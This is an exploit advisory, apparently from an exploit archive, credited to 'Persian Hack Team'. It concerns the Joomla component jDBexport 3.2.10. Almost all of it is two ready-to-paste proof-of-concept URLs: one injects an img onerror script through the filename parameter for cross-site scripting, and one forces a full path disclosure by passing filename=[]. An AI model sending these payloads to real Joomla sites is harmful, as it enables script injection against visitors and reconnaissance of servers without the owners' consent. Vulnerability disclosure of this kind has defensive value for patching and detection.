Joomla jDBexport 3.2.10 Cross Site Scripting / Path Disclosure

`# Exploit Title: Joomla Component jDBexport 3.2.10 - Cross-site scripting / Full Path Disclosure  
# Exploit Author: Persian Hack Team  
# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)  
# Home : https://extensions.joomla.org/extensions/extension/core-enhancements/data-reports/jdbexport/  
# Home : http://persian-team.ir/  
# Telegram Channel AND Demo: @PersianHackTeam  
# Tested on: Linux  
# Date: 2017-04-26  
  
# POC :  
# filename Parameter Vulnerable to Cross-site scripting :  
https://www.target.com/components/com_jdbexport/helpers/downloadDocument.php?cache=1&token1=6d13d67c326ce71e864d3826885f7f63&token2=L2hvbWUvcG9sa2Fkb3Rwb3dlcmhvdS9wdWJsaWNfaHRtbC9tZWRpYS9jb21famRiZXhwb3J0L2RvY3VtZW50cy8,&cachefiletype=xls&filename=%3Cimg%20src=%221%22%20onerror=alert%28%22XSS%22%29%3E5d0eb34b31&debugcomponent=1  
  
  
# Full Path Disclosure  
https://www.target.com/components/com_jdbexport/helpers/downloadDocument.php?cache=1&token1=6d13d67c326ce71e864d3826885f7f63&token2=L2hvbWUvcG9sa2Fkb3Rwb3dlcmhvdS9wdWJsaWNfaHRtbC9tZWRpYS9jb21famRiZXhwb3J0L2RvY3VtZW50cy8,&cachefiletype=php&filename=[]&debugcomponent=1  
  
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members  
# Iranian White Hat Hackers  
`